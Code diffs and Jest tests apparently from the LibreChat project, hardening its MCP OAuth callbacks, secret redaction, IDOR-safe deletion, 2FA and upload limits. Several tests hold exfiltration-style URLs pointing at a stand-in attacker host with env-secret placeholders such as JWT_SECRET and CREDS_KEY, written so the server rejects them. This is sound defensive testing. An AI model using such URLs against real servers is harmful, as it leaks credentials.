it('should reject when only a COMPLETED flow exists (not PENDING)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'COMPLETED',
createdAt: Date.now(),
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
it('should reject when PENDING flow is stale (older than PENDING_STALE_MS)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now() - 3 * 60 * 1000,
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
});
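The four cases above pin down the fallback predicate: the flow must exist, have status `PENDING`, and be younger than `PENDING_STALE_MS`. The 3-minute-old flow is rejected, so the real threshold is at most that; the 2-minute constant in this sketch is an assumption, as is the helper name:

```javascript
const PENDING_STALE_MS = 2 * 60 * 1000; // assumed threshold, below the 3 min the test rejects

// A cookieless callback may fall back to the server-side flow state only
// when all three conditions hold; otherwise csrf_validation_failed.
const isActivePendingFlow = (flow, now = Date.now()) =>
  Boolean(flow) &&
  flow.status === 'PENDING' &&
  now - flow.createdAt < PENDING_STALE_MS;
```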
it('should handle OAuth callback successfully', async () => { it('should handle OAuth callback successfully', async () => {
// mockRegistryInstance is defined at the top of the file // mockRegistryInstance is defined at the top of the file
const mockFlowManager = { const mockFlowManager = {
@ -1572,12 +1693,14 @@ describe('MCP Routes', () => {
it('should return all server configs for authenticated user', async () => { it('should return all server configs for authenticated user', async () => {
const mockServerConfigs = { const mockServerConfigs = {
'server-1': { 'server-1': {
endpoint: 'http://server1.com', type: 'sse',
name: 'Server 1', url: 'http://server1.com/sse',
title: 'Server 1',
}, },
'server-2': { 'server-2': {
endpoint: 'http://server2.com', type: 'sse',
name: 'Server 2', url: 'http://server2.com/sse',
title: 'Server 2',
}, },
}; };
@@ -1586,7 +1709,18 @@ describe('MCP Routes', () => {
      const response = await request(app).get('/api/mcp/servers');
      expect(response.status).toBe(200);
-     expect(response.body).toEqual(mockServerConfigs);
+     expect(response.body['server-1']).toMatchObject({
+       type: 'sse',
+       url: 'http://server1.com/sse',
+       title: 'Server 1',
+     });
+     expect(response.body['server-2']).toMatchObject({
+       type: 'sse',
+       url: 'http://server2.com/sse',
+       title: 'Server 2',
+     });
+     expect(response.body['server-1'].headers).toBeUndefined();
+     expect(response.body['server-2'].headers).toBeUndefined();
      expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id');
    });
@@ -1641,10 +1775,10 @@ describe('MCP Routes', () => {
      const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
      expect(response.status).toBe(201);
-     expect(response.body).toEqual({
-       serverName: 'test-sse-server',
-       ...validConfig,
-     });
+     expect(response.body.serverName).toBe('test-sse-server');
+     expect(response.body.type).toBe('sse');
+     expect(response.body.url).toBe('https://mcp-server.example.com/sse');
+     expect(response.body.title).toBe('Test SSE Server');
      expect(mockRegistryInstance.addServer).toHaveBeenCalledWith(
        'temp_server_name',
        expect.objectContaining({
@@ -1698,6 +1832,78 @@ describe('MCP Routes', () => {
      expect(response.body.message).toBe('Invalid configuration');
    });
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}&iv=${CREDS_IV}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
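The rejection tests above all target URLs that embed `${ENV_VAR}` placeholder syntax, which a server-side template step could otherwise expand with process secrets before connecting. A minimal sketch of such a check (this is our illustration, not LibreChat's actual validator) could look like:

```javascript
// Reject user-supplied MCP URLs that contain ${ENV_VAR} placeholder syntax,
// so environment secrets can never be interpolated into an attacker's URL.
const ENV_VAR_PATTERN = /\$\{[A-Z0-9_]+\}/i;

function isSafeUserUrl(url) {
  // true when the URL contains no env-var placeholder
  return !ENV_VAR_PATTERN.test(url);
}

console.log(isSafeUserUrl('https://mcp-server.example.com/sse')); // true
console.log(isSafeUserUrl('http://attacker.com/?secret=${JWT_SECRET}')); // false
```

In a route handler, a `false` result would map to the same `400 Invalid configuration` response the tests expect.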
it('should redact secrets from create response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Test Server',
};
mockRegistryInstance.addServer.mockResolvedValue({
serverName: 'test-server',
config: {
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' },
oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' },
headers: { Authorization: 'Bearer leaked-token' },
},
});
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
expect(response.status).toBe(201);
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.headers).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_id).toBe('cid');
});
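The redaction behavior these tests assert — secrets stripped, non-sensitive identifiers kept — can be sketched as a small helper (the function name and exact field handling here are our assumption, not LibreChat's implementation):

```javascript
// Strip secret material from a server config before returning it to clients,
// while preserving non-sensitive identifiers (apiKey.source, oauth.client_id).
function redactServerConfig(config) {
  // Drop whole fields that can carry secrets (headers, oauth_headers, env).
  const { headers, oauth_headers, env, apiKey, oauth, ...rest } = config;
  const redacted = { ...rest };
  if (apiKey) {
    const { key, ...apiKeyRest } = apiKey; // remove only the secret key itself
    redacted.apiKey = apiKeyRest;
  }
  if (oauth) {
    const { client_secret, ...oauthRest } = oauth; // keep client_id
    redacted.oauth = oauthRest;
  }
  return redacted;
}

const safe = redactServerConfig({
  type: 'sse',
  url: 'https://mcp-server.example.com/sse',
  apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' },
  oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' },
  headers: { Authorization: 'Bearer leaked-token' },
});
console.log(safe.apiKey.key === undefined, safe.oauth.client_id); // true cid
```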
it('should return 500 when registry throws error', async () => {
  const validConfig = {
    type: 'sse',
@@ -1727,7 +1933,9 @@ describe('MCP Routes', () => {
      const response = await request(app).get('/api/mcp/servers/test-server');
      expect(response.status).toBe(200);
-     expect(response.body).toEqual(mockConfig);
+     expect(response.body.type).toBe('sse');
+     expect(response.body.url).toBe('https://mcp-server.example.com/sse');
+     expect(response.body.title).toBe('Test Server');
      expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith(
        'test-server',
        'test-user-id',
@@ -1743,6 +1951,29 @@ describe('MCP Routes', () => {
      expect(response.body).toEqual({ message: 'MCP server not found' });
    });
it('should redact secrets from get response', async () => {
mockRegistryInstance.getServerConfig.mockResolvedValue({
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Secret Server',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'decrypted-admin-key' },
oauth: { client_id: 'cid', client_secret: 'decrypted-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
oauth_headers: { 'X-OAuth': 'secret-value' },
});
const response = await request(app).get('/api/mcp/servers/secret-server');
expect(response.status).toBe(200);
expect(response.body.title).toBe('Secret Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.oauth_headers).toBeUndefined();
});
it('should return 500 when registry throws error', async () => {
  mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error'));
@@ -1769,7 +2000,9 @@ describe('MCP Routes', () => {
        .send({ config: updatedConfig });
      expect(response.status).toBe(200);
-     expect(response.body).toEqual(updatedConfig);
+     expect(response.body.type).toBe('sse');
+     expect(response.body.url).toBe('https://updated-mcp-server.example.com/sse');
+     expect(response.body.title).toBe('Updated Server');
      expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith(
        'test-server',
        expect.objectContaining({
@@ -1781,6 +2014,35 @@ describe('MCP Routes', () => {
      );
    });
it('should redact secrets from update response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Updated Server',
};
mockRegistryInstance.updateServer.mockResolvedValue({
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'preserved-admin-key' },
oauth: { client_id: 'cid', client_secret: 'preserved-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
env: { DATABASE_URL: 'postgres://admin:pass@localhost/db' },
});
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({ config: validConfig });
expect(response.status).toBe(200);
expect(response.body.title).toBe('Updated Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.env).toBeUndefined();
});
it('should return 400 for invalid configuration', async () => {
  const invalidConfig = {
    type: 'sse',
@@ -1797,6 +2059,51 @@ describe('MCP Routes', () => {
      expect(response.body.errors).toBeDefined();
    });
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should return 500 when registry throws error', async () => {
  const validConfig = {
    type: 'sse',

View file

@@ -0,0 +1,200 @@
const mongoose = require('mongoose');
const express = require('express');
const request = require('supertest');
const { v4: uuidv4 } = require('uuid');
const { MongoMemoryServer } = require('mongodb-memory-server');
jest.mock('@librechat/agents', () => ({
sleep: jest.fn(),
}));
jest.mock('@librechat/api', () => ({
unescapeLaTeX: jest.fn((x) => x),
countTokens: jest.fn().mockResolvedValue(10),
}));
jest.mock('@librechat/data-schemas', () => ({
...jest.requireActual('@librechat/data-schemas'),
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
}));
jest.mock('~/models', () => ({
saveConvo: jest.fn(),
getMessage: jest.fn(),
saveMessage: jest.fn(),
getMessages: jest.fn(),
updateMessage: jest.fn(),
deleteMessages: jest.fn(),
}));
jest.mock('~/server/services/Artifacts/update', () => ({
findAllArtifacts: jest.fn(),
replaceArtifactContent: jest.fn(),
}));
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
jest.mock('~/server/middleware', () => ({
requireJwtAuth: (req, res, next) => next(),
validateMessageReq: (req, res, next) => next(),
}));
jest.mock('~/models/Conversation', () => ({
getConvosQueried: jest.fn(),
}));
jest.mock('~/db/models', () => ({
Message: {
findOne: jest.fn(),
find: jest.fn(),
meiliSearch: jest.fn(),
},
}));
/* ─── Model-level tests: real MongoDB, proves cross-user deletion is prevented ─── */
const { messageSchema } = require('@librechat/data-schemas');
describe('deleteMessages model-level IDOR prevention', () => {
let mongoServer;
let Message;
const ownerUserId = 'user-owner-111';
const attackerUserId = 'user-attacker-222';
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
Message = mongoose.models.Message || mongoose.model('Message', messageSchema);
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Message.deleteMany({});
});
it("should NOT delete another user's message when attacker supplies victim messageId", async () => {
const conversationId = uuidv4();
const victimMsgId = 'victim-msg-001';
await Message.create({
messageId: victimMsgId,
conversationId,
user: ownerUserId,
text: 'Sensitive owner data',
});
await Message.deleteMany({ messageId: victimMsgId, user: attackerUserId });
const victimMsg = await Message.findOne({ messageId: victimMsgId }).lean();
expect(victimMsg).not.toBeNull();
expect(victimMsg.user).toBe(ownerUserId);
expect(victimMsg.text).toBe('Sensitive owner data');
});
it("should delete the user's own message", async () => {
const conversationId = uuidv4();
const ownMsgId = 'own-msg-001';
await Message.create({
messageId: ownMsgId,
conversationId,
user: ownerUserId,
text: 'My message',
});
const result = await Message.deleteMany({ messageId: ownMsgId, user: ownerUserId });
expect(result.deletedCount).toBe(1);
const deleted = await Message.findOne({ messageId: ownMsgId }).lean();
expect(deleted).toBeNull();
});
it('should scope deletion by conversationId, messageId, and user together', async () => {
const convoA = uuidv4();
const convoB = uuidv4();
await Message.create([
{ messageId: 'msg-a1', conversationId: convoA, user: ownerUserId, text: 'A1' },
{ messageId: 'msg-b1', conversationId: convoB, user: ownerUserId, text: 'B1' },
]);
await Message.deleteMany({ messageId: 'msg-a1', conversationId: convoA, user: attackerUserId });
const remaining = await Message.find({ user: ownerUserId }).lean();
expect(remaining).toHaveLength(2);
});
});
/* ─── Route-level tests: supertest + mocked deleteMessages ─── */
describe('DELETE /:conversationId/:messageId route handler', () => {
let app;
const { deleteMessages } = require('~/models');
const authenticatedUserId = 'user-owner-123';
beforeAll(() => {
const messagesRouter = require('../messages');
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: authenticatedUserId };
next();
});
app.use('/api/messages', messagesRouter);
});
beforeEach(() => {
jest.clearAllMocks();
});
it('should pass user and conversationId in the deleteMessages filter', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
await request(app).delete('/api/messages/convo-1/msg-1');
expect(deleteMessages).toHaveBeenCalledTimes(1);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-1',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 204 on successful deletion', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
const response = await request(app).delete('/api/messages/convo-1/msg-owned');
expect(response.status).toBe(204);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-owned',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 500 when deleteMessages throws', async () => {
deleteMessages.mockRejectedValue(new Error('DB failure'));
const response = await request(app).delete('/api/messages/convo-1/msg-1');
expect(response.status).toBe(500);
expect(response.body).toEqual({ error: 'Internal server error' });
});
});
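Both the model-level and route-level tests above reduce to one invariant: the delete filter always carries the server-side authenticated user id. A minimal sketch of building that filter (function name is ours, not the route's):

```javascript
// Build an IDOR-safe delete filter: the ownership scope comes from the
// authenticated session (req.user.id), never from client-supplied input,
// so a victim's messageId alone can never match another user's document.
function buildMessageDeleteFilter({ conversationId, messageId }, authenticatedUserId) {
  return {
    messageId,
    conversationId,
    user: authenticatedUserId,
  };
}

const filter = buildMessageDeleteFilter(
  { conversationId: 'convo-1', messageId: 'msg-1' },
  'user-owner-123',
);
console.log(filter); // { messageId: 'msg-1', conversationId: 'convo-1', user: 'user-owner-123' }
```

Passing this filter to `Message.deleteMany` yields `deletedCount: 0` for any document the caller does not own, which is exactly what the attacker-scenario tests assert.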

View file

@@ -143,6 +143,9 @@ router.post(
    if (actions_result && actions_result.length) {
      const action = actions_result[0];
+     if (action.agent_id !== agent_id) {
+       return res.status(403).json({ message: 'Action does not belong to this agent' });
+     }
      metadata = { ...action.metadata, ...metadata };
    }
@@ -184,7 +187,7 @@ router.post(
    }
    /** @type {[Action]} */
-   const updatedAction = await updateAction({ action_id }, actionUpdateData);
+   const updatedAction = await updateAction({ action_id, agent_id }, actionUpdateData);
    const sensitiveFields = ['api_key', 'oauth_client_id', 'oauth_client_secret'];
    for (let field of sensitiveFields) {
@@ -251,7 +254,13 @@ router.delete(
      { tools: updatedTools, actions: updatedActions },
      { updatingUserId: req.user.id, forceVersion: true },
    );
-   await deleteAction({ action_id });
+   const deleted = await deleteAction({ action_id, agent_id });
+   if (!deleted) {
+     logger.warn('[Agent Action Delete] No matching action document found', {
+       action_id,
+       agent_id,
+     });
+   }
    res.status(200).json({ message: 'Action deleted successfully' });
  } catch (error) {
    const message = 'Trouble deleting the Agent Action';

View file

@@ -76,52 +76,62 @@ router.get('/chat/stream/:streamId', async (req, res) => {
  logger.debug(`[AgentStream] Client subscribed to ${streamId}, resume: ${isResume}`);

- // Send sync event with resume state for ALL reconnecting clients
- // This supports multi-tab scenarios where each tab needs run step data
- if (isResume) {
-   const resumeState = await GenerationJobManager.getResumeState(streamId);
-   if (resumeState && !res.writableEnded) {
-     // Send sync event with run steps AND aggregatedContent
-     // Client will use aggregatedContent to initialize message state
-     res.write(`event: message\ndata: ${JSON.stringify({ sync: true, resumeState })}\n\n`);
-     if (typeof res.flush === 'function') {
-       res.flush();
-     }
-     logger.debug(
-       `[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps`,
-     );
-   }
- }
-
- const result = await GenerationJobManager.subscribe(
-   streamId,
-   (event) => {
-     if (!res.writableEnded) {
-       res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
-       if (typeof res.flush === 'function') {
-         res.flush();
-       }
-     }
-   },
-   (event) => {
-     if (!res.writableEnded) {
-       res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
-       if (typeof res.flush === 'function') {
-         res.flush();
-       }
-       res.end();
-     }
-   },
-   (error) => {
-     if (!res.writableEnded) {
-       res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`);
-       if (typeof res.flush === 'function') {
-         res.flush();
-       }
-       res.end();
-     }
-   },
- );
+ const writeEvent = (event) => {
+   if (!res.writableEnded) {
+     res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
+     if (typeof res.flush === 'function') {
+       res.flush();
+     }
+   }
+ };
+
+ const onDone = (event) => {
+   writeEvent(event);
+   res.end();
+ };
+
+ const onError = (error) => {
+   if (!res.writableEnded) {
+     res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`);
+     if (typeof res.flush === 'function') {
+       res.flush();
+     }
+     res.end();
+   }
+ };
+
+ let result;
+ if (isResume) {
+   const { subscription, resumeState, pendingEvents } =
+     await GenerationJobManager.subscribeWithResume(streamId, writeEvent, onDone, onError);
+   if (!res.writableEnded) {
+     if (resumeState) {
+       res.write(
+         `event: message\ndata: ${JSON.stringify({ sync: true, resumeState, pendingEvents })}\n\n`,
+       );
+       if (typeof res.flush === 'function') {
+         res.flush();
+       }
+       GenerationJobManager.markSyncSent(streamId);
+       logger.debug(
+         `[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps, ${pendingEvents.length} pending events`,
+       );
+     } else if (pendingEvents.length > 0) {
+       for (const event of pendingEvents) {
+         writeEvent(event);
+       }
+       logger.warn(
+         `[AgentStream] Resume state null for ${streamId}, replayed ${pendingEvents.length} gap events directly`,
+       );
+     }
+   }
+
+   result = subscription;
+ } else {
+   result = await GenerationJobManager.subscribe(streamId, writeEvent, onDone, onError);
+ }

  if (!result) {
    return res.status(404).json({ error: 'Failed to subscribe to stream' });
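Every payload in the handler above is written with the same Server-Sent Events framing. A minimal standalone sketch of that framing (helper name is ours):

```javascript
// SSE framing: a named event line, a JSON data line, then a blank-line
// terminator that tells the client the event is complete.
function formatSseEvent(payload, eventName = 'message') {
  return `event: ${eventName}\ndata: ${JSON.stringify(payload)}\n\n`;
}

console.log(formatSseEvent({ sync: true }));
```

Extracting the framing into one function is what lets the route share a single `writeEvent` across the live-event, done, and resume-replay paths.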

View file

@@ -60,6 +60,9 @@ router.post('/:assistant_id', async (req, res) => {
    if (actions_result && actions_result.length) {
      const action = actions_result[0];
+     if (action.assistant_id !== assistant_id) {
+       return res.status(403).json({ message: 'Action does not belong to this assistant' });
+     }
      metadata = { ...action.metadata, ...metadata };
    }
@@ -117,7 +120,7 @@ router.post('/:assistant_id', async (req, res) => {
      // For new actions, use the assistant owner's user ID
      actionUpdateData.user = assistant_user || req.user.id;
    }
-   promises.push(updateAction({ action_id }, actionUpdateData));
+   promises.push(updateAction({ action_id, assistant_id }, actionUpdateData));
    /** @type {[AssistantDocument, Action]} */
    let [assistantDocument, updatedAction] = await Promise.all(promises);
@@ -196,9 +199,15 @@ router.delete('/:assistant_id/:action_id/:model', async (req, res) => {
      assistantUpdateData.user = req.user.id;
    }
    promises.push(updateAssistantDoc({ assistant_id }, assistantUpdateData));
-   promises.push(deleteAction({ action_id }));
-   await Promise.all(promises);
+   promises.push(deleteAction({ action_id, assistant_id }));
+   const [, deletedAction] = await Promise.all(promises);
+   if (!deletedAction) {
+     logger.warn('[Assistant Action Delete] No matching action document found', {
+       action_id,
+       assistant_id,
+     });
+   }
    res.status(200).json({ message: 'Action deleted successfully' });
  } catch (error) {
    const message = 'Trouble deleting the Assistant Action';

View file

@@ -63,7 +63,7 @@ router.post(
  resetPasswordController,
);

- router.get('/2fa/enable', middleware.requireJwtAuth, enable2FA);
+ router.post('/2fa/enable', middleware.requireJwtAuth, enable2FA);
router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA);
router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken);
router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA);

View file

@@ -1,7 +1,7 @@
const multer = require('multer');
const express = require('express');
const { sleep } = require('@librechat/agents');
- const { isEnabled } = require('@librechat/api');
+ const { isEnabled, resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas');
const { CacheKeys, EModelEndpoint } = require('librechat-data-provider');
const {
@@ -224,8 +224,27 @@ router.post('/update', validateConvoAccess, async (req, res) => {
});

const { importIpLimiter, importUserLimiter } = createImportLimiters();
+ /** Fork and duplicate share one rate-limit budget (same "clone" operation class) */
const { forkIpLimiter, forkUserLimiter } = createForkLimiters();

- const upload = multer({ storage: storage, fileFilter: importFileFilter });
+ const importMaxFileSize = resolveImportMaxFileSize();
const upload = multer({
storage,
fileFilter: importFileFilter,
limits: { fileSize: importMaxFileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
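The `resolveImportMaxFileSize` helper imported above is not shown in this diff; one plausible shape for it, sketched here purely as an assumption (the environment variable name `IMPORT_MAX_FILE_SIZE` and the default are ours, not confirmed by the source), is an env-driven byte limit with a fallback:

```javascript
// Resolve the max import file size in bytes from the environment, falling
// back to a default so multer always gets a finite limits.fileSize value.
const DEFAULT_IMPORT_MAX_FILE_SIZE = 25 * 1024 * 1024; // 25 MiB, assumed default

function resolveImportMaxFileSizeSketch(env = process.env) {
  const raw = Number(env.IMPORT_MAX_FILE_SIZE); // hypothetical variable name
  return Number.isFinite(raw) && raw > 0 ? raw : DEFAULT_IMPORT_MAX_FILE_SIZE;
}

console.log(resolveImportMaxFileSizeSketch({ IMPORT_MAX_FILE_SIZE: '1048576' })); // 1048576
console.log(resolveImportMaxFileSizeSketch({})); // 26214400
```

Whatever the real resolver returns, multer enforces it via `limits.fileSize` and surfaces violations as a `LIMIT_FILE_SIZE` error, which `handleUpload` above maps to a 413 response.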
/**
 * Imports a conversation from a JSON file and saves it to the database.
@@ -238,7 +257,7 @@ router.post(
  importIpLimiter,
  importUserLimiter,
  configMiddleware,
- upload.single('file'),
+ handleUpload,
  async (req, res) => {
    try {
      /* TODO: optimize to return imported conversations and add manually */
@@ -280,7 +299,7 @@ router.post('/fork', forkIpLimiter, forkUserLimiter, async (req, res) => {
  }
});

- router.post('/duplicate', async (req, res) => {
+ router.post('/duplicate', forkIpLimiter, forkUserLimiter, async (req, res) => {
  const { conversationId, title } = req.body;
  try {

View file

@@ -2,12 +2,12 @@ const fs = require('fs').promises;
const express = require('express');
const { EnvVar } = require('@librechat/agents');
const { logger } = require('@librechat/data-schemas');
+ const { verifyAgentUploadPermission } = require('@librechat/api');
const {
  Time,
  isUUID,
  CacheKeys,
  FileSources,
- SystemRoles,
  ResourceType,
  EModelEndpoint,
  PermissionBits,
@@ -381,48 +381,15 @@ router.post('/', async (req, res) => {
    return await processFileUpload({ req, res, metadata });
  }

- /**
-  * Check agent permissions for permanent agent file uploads (not message attachments).
-  * Message attachments (message_file=true) are temporary files for a single conversation
-  * and should be allowed for users who can chat with the agent.
-  * Permanent file uploads to tool_resources require EDIT permission.
-  */
- const isMessageAttachment = metadata.message_file === true || metadata.message_file === 'true';
- if (metadata.agent_id && metadata.tool_resource && !isMessageAttachment) {
-   const userId = req.user.id;
-   /** Admin users bypass permission checks */
-   if (req.user.role !== SystemRoles.ADMIN) {
-     const agent = await getAgent({ id: metadata.agent_id });
-     if (!agent) {
-       return res.status(404).json({
-         error: 'Not Found',
-         message: 'Agent not found',
-       });
-     }
-     /** Check if user is the author or has edit permission */
-     if (agent.author.toString() !== userId) {
-       const hasEditPermission = await checkPermission({
-         userId,
-         role: req.user.role,
-         resourceType: ResourceType.AGENT,
-         resourceId: agent._id,
-         requiredPermission: PermissionBits.EDIT,
-       });
-       if (!hasEditPermission) {
-         logger.warn(
-           `[/files] User ${userId} denied upload to agent ${metadata.agent_id} (insufficient permissions)`,
-         );
-         return res.status(403).json({
-           error: 'Forbidden',
-           message: 'Insufficient permissions to upload files to this agent',
-         });
-       }
-     }
-   }
- }
+ const denied = await verifyAgentUploadPermission({
+   req,
+   res,
+   metadata,
+   getAgent,
+   checkPermission,
+ });
+ if (denied) {
+   return;
+ }

  return await processAgentFileUpload({ req, res, metadata });
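The inline block removed above gates only permanent agent file uploads, not per-message attachments. A condensed sketch of that gating predicate, derived from the removed code (the helper name here is ours for illustration):

```javascript
// Decide whether an upload needs the agent EDIT-permission check:
// permanent tool_resource uploads do; message attachments do not.
function needsAgentUploadCheck(metadata) {
  const isMessageAttachment =
    metadata.message_file === true || metadata.message_file === 'true';
  return Boolean(metadata.agent_id && metadata.tool_resource && !isMessageAttachment);
}

console.log(needsAgentUploadCheck({ agent_id: 'a1', tool_resource: 'context' })); // true
console.log(
  needsAgentUploadCheck({ agent_id: 'a1', tool_resource: 'context', message_file: 'true' }),
); // false
```

When the predicate holds, the removed code then allowed admins unconditionally, allowed the agent's author, and otherwise required an ACL EDIT grant; the new `verifyAgentUploadPermission` helper encapsulates that same sequence.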

View file

@@ -0,0 +1,376 @@
const express = require('express');
const request = require('supertest');
const mongoose = require('mongoose');
const { v4: uuidv4 } = require('uuid');
const { createMethods } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const {
SystemRoles,
AccessRoleIds,
ResourceType,
PrincipalType,
} = require('librechat-data-provider');
const { createAgent } = require('~/models/Agent');
jest.mock('~/server/services/Files/process', () => ({
processAgentFileUpload: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Agent file uploaded', file_id: 'test-file-id' });
}),
processImageFile: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Image processed' });
}),
filterFile: jest.fn(),
}));
jest.mock('fs', () => {
const actualFs = jest.requireActual('fs');
return {
...actualFs,
promises: {
...actualFs.promises,
unlink: jest.fn().mockResolvedValue(undefined),
},
};
});
const fs = require('fs');
const { processAgentFileUpload } = require('~/server/services/Files/process');
const router = require('~/server/routes/files/images');
describe('POST /images - Agent Upload Permission Check (Integration)', () => {
let mongoServer;
let authorId;
let otherUserId;
let agentCustomId;
let User;
let Agent;
let AclEntry;
let methods;
let modelsToCleanup = [];
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
await mongoose.connect(mongoUri);
const { createModels } = require('@librechat/data-schemas');
const models = createModels(mongoose);
modelsToCleanup = Object.keys(models);
Object.assign(mongoose.models, models);
methods = createMethods(mongoose);
User = models.User;
Agent = models.Agent;
AclEntry = models.AclEntry;
await methods.seedDefaultRoles();
});
afterAll(async () => {
const collections = mongoose.connection.collections;
for (const key in collections) {
await collections[key].deleteMany({});
}
for (const modelName of modelsToCleanup) {
if (mongoose.models[modelName]) {
delete mongoose.models[modelName];
}
}
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Agent.deleteMany({});
await User.deleteMany({});
